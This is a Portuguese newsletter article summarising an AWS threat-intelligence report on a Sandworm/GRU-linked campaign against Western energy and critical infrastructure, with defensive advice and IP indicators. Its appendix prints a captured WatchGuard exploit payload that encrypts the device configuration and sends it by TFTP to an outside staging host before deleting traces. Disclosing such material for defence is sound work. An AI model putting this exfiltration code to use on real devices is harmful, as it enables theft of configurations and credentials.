CloudTroop Newsletter
16 de dezembro de 2025 AWS AWS

Inteligência de Ameaças da AWS Identifica Grupo Cibernético Russo Direcionado a Infraestruturas Críticas Ocidentais

Uma Evolução Preocupante nas Táticas de Ataque

Ao finalizar 2025, a Amazon Threat Intelligence compartilhou descobertas significativas sobre uma campanha de longa duração atribuída a atores patrocinados pelo Estado russo. O que torna essa atividade particularmente relevante é uma transformação tática notável: dispositivos de borda de rede aparentemente mal configurados tornaram-se o principal vetor de acesso inicial, enquanto a exploração de vulnerabilidades declinou substancialmente.

Essa adaptação operacional mantém os mesmos resultados para o ator — coleta de credenciais e movimentação lateral dentro das infraestruturas das vítimas — mas reduz significativamente a exposição e o custo de recursos do atacante. Para as organizações que gerenciam infraestruturas críticas, isso representa um desafio particularmente relevante em 2026: proteger os dispositivos de borda de rede e monitorar ataques de repetição de credenciais tornam-se prioridades estratégicas.

Baseando-se em sobreposições de infraestrutura com operações conhecidas do Sandworm (também identificado como APT44 e Seashell Blizzard), observadas nos dados de telemetria da AWS, a Amazon Threat Intelligence avalia com alta confiança que esse cluster de atividades está associado à Diretoria Principal de Inteligência da Rússia (Glavnoe Razvedyvatel'noe Upravlenie — GRU).

Escopo e Evolução da Campanha

A campanha demonstra foco sustentado em infraestruturas críticas ocidentais, particularmente no setor de energia, com operações registradas entre 2021 e o presente.

Linha do Tempo de Evolução Tática

A análise da Amazon Threat Intelligence mapeou a progressão clara das técnicas utilizadas:

  • 2021-2022: Exploração de vulnerabilidades em dispositivos WatchGuard (CVE-2022-26318) detectada pelo Amazon MadPot; direcionamento a dispositivos mal configurados iniciou-se nesse período
  • 2022-2023: Exploração de vulnerabilidades em plataformas Confluence (CVE-2021-26084, CVE-2023-22518); continuação do direcionamento a dispositivos mal configurados
  • 2024: Exploração de vulnerabilidades em soluções Veeam (CVE-2023-27532); prosseguimento com foco em dispositivos de borda mal configurados
  • 2025: Direcionamento sustentado a dispositivos de borda de rede de clientes mal configurados; declínio notável na atividade de exploração de zero-day e N-day

Alvos Principais

O direcionamento mantém padrões consistentes e estratégicos:

  • Organizações do setor de energia em nações ocidentais
  • Provedores de infraestrutura crítica na América do Norte e Europa
  • Organizações com infraestrutura de rede hospedada em nuvem

Recursos Comumente Comprometidos

Os atores focam em ativos específicos da infraestrutura de rede:

  • Roteadores corporativos e infraestrutura de roteamento
  • Concentradores VPN (Rede Privada Virtual) e gateways de acesso remoto
  • Aparelhos de gerenciamento de rede
  • Plataformas de colaboração e wiki
  • Sistemas de gerenciamento de projetos baseados em nuvem

Ao direcionarem o "fruto maduro" de dispositivos de clientes provavelmente mal configurados com interfaces de gerenciamento expostas, os atores alcançam objetivos estratégicos idênticos: obter acesso persistente às redes de infraestrutura crítica e coletar credenciais para acessar os serviços online das organizações vítimas.

A Mudança Estratégica em Atividade do Ator

A transformação tática observada entre 2021 e 2025 revela uma estratégia sofisticada. Embora o direcionamento de dispositivos mal configurados tenha prosseguido desde pelo menos 2022, o ator manteve foco sustentado nessa atividade em 2025 enquanto reduzia investimentos em exploração de zero-day e N-day. Essa abordagem permite alcançar objetivos operacionais enquanto reduz significativamente o risco de exposição mediante atividades de exploração de vulnerabilidades mais detectáveis.

Operações de Coleta de Credenciais

Embora a Amazon Threat Intelligence não tenha observado diretamente o mecanismo de extração de credenciais das organizações vítimas, múltiplos indicadores apontam para captura de pacotes e análise de tráfego como método principal de coleta:

  • Análise Temporal: O intervalo de tempo entre o comprometimento do dispositivo e tentativas de autenticação contra serviços da vítima sugere coleta passiva em vez de roubo ativo de credenciais
  • Tipo de Credencial: O uso de credenciais da organização vítima (não credenciais do dispositivo) para acessar serviços online indica interceptação de tráfego de autenticação do usuário
  • Tradecraft Conhecido: Operações do Sandworm consistentemente envolvem capacidades de interceptação de tráfego de rede
  • Posicionamento Estratégico: O direcionamento de dispositivos de borda de rede posiciona estrategicamente o ator para interceptar credenciais em trânsito

Infraestrutura Comprometida e Operações de Repetição de Credenciais

Comprometimento de Infraestrutura Hospedada na AWS

A telemetria da AWS revelou operações coordenadas contra dispositivos de borda de rede de clientes. Importante ressaltar: isso não resultou de fraqueza na AWS, mas de dispositivos mal configurados pelos clientes. A análise de conexões de rede mostrou endereços IP controlados pelo ator estabelecendo conexões persistentes com instâncias EC2 que executavam software de aparelhos de rede de clientes. As análises revelaram conexões persistentes consistentes com acesso interativo e recuperação de dados em múltiplas instâncias afetadas.

Padrão de Repetição de Credenciais

Além do comprometimento direto de infraestrutura das vítimas, a AWS observou ataques sistemáticos de repetição de credenciais contra serviços online das organizações vítimas. Nos casos observados, o ator comprometeu dispositivos de borda de rede hospedados na AWS e subsequentemente tentou autenticação usando credenciais associadas ao domínio da organização vítima contra seus serviços online. Embora essas tentativas específicas tenham sido malsucedidas, o padrão de comprometimento de dispositivo seguido por tentativas de autenticação usando credenciais das vítimas valida a avaliação de que o ator colhe credenciais da infraestrutura de rede de clientes comprometida para repetição contra os serviços online das organizações alvo.

A infraestrutura do ator acessou endpoints de autenticação de múltiplas organizações em setores críticos através de 2025, incluindo:

  • Setor de Energia: Organizações de serviços de eletricidade, provedores de energia e provedores de serviços de segurança gerenciados especializados em clientes do setor energético
  • Tecnologia/Serviços em Nuvem: Plataformas de colaboração, repositórios de código-fonte
  • Telecomunicações: Provedores de telecomunicações em múltiplas regiões

Geograficamente, o direcionamento demonstra alcance global: América do Norte, Europa (Ocidental e Oriental) e Oriente Médio. O padrão revela foco sustentado na cadeia de suprimentos do setor energético, incluindo tanto operadores diretos quanto provedores de terceiros com acesso a redes de infraestrutura crítica.

Fluxo da Campanha

O padrão operacional segue uma sequência clara:

  1. Comprometimento de dispositivo de borda de rede de cliente hospedado na AWS
  2. Aproveitamento de capacidade nativa de captura de pacotes
  3. Coleta de credenciais do tráfego interceptado
  4. Repetição de credenciais contra serviços online e infraestrutura das organizações vítimas
  5. Estabelecimento de acesso persistente para movimentação lateral

Sobreposição de Infraestrutura com "Curly COMrades"

A Amazon Threat Intelligence identificou sobreposição de infraestrutura do ator com o grupo que a Bitdefender rastreia como "Curly COMrades". A avaliação é de que essas atividades podem representar operações complementares dentro de uma campanha GRU mais ampla:

  • Relatório da Bitdefender: Tradecraft baseado em host pós-comprometimento (abuso de Hyper-V para evasão de EDR — Detecção e Resposta do Endpoint, implants personalizados CurlyShell/CurlCat)
  • Telemetria da Amazon: Vetores de acesso inicial e metodologia de pivô em nuvem

Essa potencial divisão operacional, onde um cluster se concentra em acesso à rede e comprometimento inicial enquanto outro lida com persistência baseada em host e evasão, alinha-se com padrões operacionais do GRU de subclusters especializados apoiando objetivos de campanha mais amplos.

Resposta e Disrupção da AWS

A AWS mantém comprometimento com proteção de clientes e do ecossistema de internet mais amplo através de investigação ativa e disrupção de atores de ameaça sofisticados.

Ações de Resposta Imediata

  • Identificação e notificação de clientes afetados sobre recursos de aparelhos de rede comprometidos
  • Habilitação de remediação imediata de instâncias EC2 comprometidas
  • Compartilhamento de inteligência com parceiros da indústria e fornecedores afetados
  • Relato de observações a fornecedores de aparelhos de rede para apoiar investigações de segurança

Impacto de Disrupção

Através de esforços coordenados, desde a descoberta dessa atividade, a AWS perturbou operações ativas do ator de ameaça e reduziu a superfície de ataque disponível a esse subcluster de atividade de ameaça. O trabalho continuará com a comunidade de segurança para compartilhar inteligência e defender coletivamente contra ameaças patrocinadas pelo Estado direcionadas a infraestruturas críticas.

Defendendo Sua Organização

Para 2026, as organizações devem monitorar proativamente evidências desse padrão de atividade.

Auditoria de Dispositivos de Borda de Rede

  • Auditar todos os dispositivos de borda de rede para arquivos ou utilitários inesperados de captura de pacotes
  • Revisar configurações de dispositivos para interfaces de gerenciamento expostas
  • Implementar segmentação de rede para isolar interfaces de gerenciamento
  • Aplicar autenticação forte (eliminar credenciais padrão, implementar autenticação multifator)

Detecção de Repetição de Credenciais

  • Revisar logs de autenticação em busca de reutilização de credenciais entre interfaces de gerenciamento de dispositivos de rede e serviços online
  • Monitorar tentativas de autenticação de localizações geográficas inesperadas
  • Implementar detecção de anomalias para padrões de autenticação nos serviços online da organização
  • Revisar janelas de tempo estendidas seguindo qualquer suspeita de comprometimento de dispositivo para tentativas de repetição de credenciais atrasadas

Monitoramento de Acesso

  • Monitorar sessões interativas em portais de administração de roteador/aparelhos de IPs de origem inesperada
  • Examinar se interfaces de gerenciamento de dispositivos de rede estão inadvertidamente expostas à internet
  • Auditar uso de protocolo de texto simples (Telnet, HTTP, SNMP não criptografado) que poderia expor credenciais

Revisão de IOCs (Indicadores de Comprometimento)

Organizações do setor de energia e operadores de infraestrutura crítica devem priorizar revisão de logs de acesso para tentativas de autenticação dos IOCs listados abaixo.

Recomendações Específicas para Ambientes AWS

Para ambientes AWS, a implementação dessas medidas protetoras é recomendada:

Gerenciamento de Identidade e Acesso

  • Gerenciar acesso a recursos e APIs da AWS usando federação de identidade com um provedor de identidade e funções Identidade e Gerenciamento de Acesso (IAM — Identity and Access Management) sempre que possível. Para mais informações, consulte Creating IAM policies no Guia do Usuário do IAM

Segurança de Rede

  • Implementar regras menos permissivas para grupos de segurança
  • Isolar interfaces de gerenciamento em subnets privadas com acesso via bastion host
  • Habilitar VPC Flow Logs (Logs de Fluxo de Nuvem Privada Virtual) para análise de tráfego de rede

Gerenciamento de Vulnerabilidades

  • Usar Amazon Inspector para descobrir e escanear automaticamente instâncias Amazon EC2 para vulnerabilidades de software e exposição de rede não intencional. Para mais informações, consulte o Amazon Inspector User Guide
  • Regularmente patchear, atualizar e proteger o sistema operacional e aplicações em instâncias

Detecção e Monitoramento

  • Habilitar AWS CloudTrail para monitoramento de atividade de API
  • Configurar Amazon GuardDuty para detecção de ameaças
  • Revisar logs de autenticação para padrões de repetição de credenciais

Indicadores de Comprometimento

Valor IOC Tipo IOC Primeiro Visto Último Visto Anotação
91.99.25[.]54 IPv4 2025-07-02 Presente Servidor legítimo comprometido usado para proxy de tráfego do ator de ameaça
185.66.141[.]145 IPv4 2025-01-10 2025-08-22 Servidor legítimo comprometido usado para proxy de tráfego do ator de ameaça
51.91.101[.]177 IPv4 2024-02-01 2024-08-28 Servidor legítimo comprometido usado para proxy de tráfego do ator de ameaça
212.47.226[.]64 IPv4 2024-10-10 2024-11-06 Servidor legítimo comprometido usado para proxy de tráfego do ator de ameaça
213.152.3[.]110 IPv4 2023-05-31 2024-09-23 Servidor legítimo comprometido usado para proxy de tráfego do ator de ameaça
145.239.195[.]220 IPv4 2021-08-12 2023-05-29 Servidor legítimo comprometido usado para proxy de tráfego do ator de ameaça
103.11.190[.]99 IPv4 2021-10-21 2023-04-02 Servidor legítimo comprometido em staging usado para exfiltração de arquivos de configuração WatchGuard
217.153.191[.]190 IPv4 2023-06-10 2025-12-08 Infraestrutura de longo prazo usada para reconhecimento e direcionamento

Nota importante: Todos os IPs identificados são servidores legítimos comprometidos que podem servir múltiplos propósitos para o ator ou continuar operações legítimas. As organizações devem investigar o contexto em torno de qualquer correspondência em vez de bloquear automaticamente. Os IPs foram especificamente observados acessando interfaces de gerenciamento de roteador e tentando autenticação a serviços online durante os períodos listados.

Apêndice Técnico: Payload de Exploit CVE-2022-26318

O seguinte payload foi capturado pelo Amazon MadPot durante a campanha de exploração WatchGuard em 2022:

from cryptography.fernet import Fernet
import subprocess
import os

key = 'uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk='

with open('/etc/wg/config.xml', 'rb') as config_file:
    buf = config_file.read()

fernet = Fernet(key)
enc_buf = fernet.encrypt(buf)

with open('/tmp/enc_config.xml', 'wb') as encrypted_config:
    encrypted_config.write(enc_buf)

subprocess.check_output(['tftp', '-p', '-l', '/tmp/enc_config.xml', '-r', '[REDACTED].bin', '103.11.190[.]99'])
os.remove('/tmp/enc_config.xml')

Esse payload demonstra a metodologia do ator: criptografar dados de configuração roubados, exfiltrar via TFTP (Trivial File Transfer Protocol) para infraestrutura de staging comprometida e remover evidências forenses.

Fonte

Amazon Threat Intelligence identifies Russian cyber threat group targeting Western critical infrastructure (https://aws.amazon.com/blogs/security/amazon-threat-intelligence-identifies-russian-cyber-threat-group-targeting-western-critical-infrastructure/)

Tem perguntas sobre este artigo? Entre em contato com AWS Support.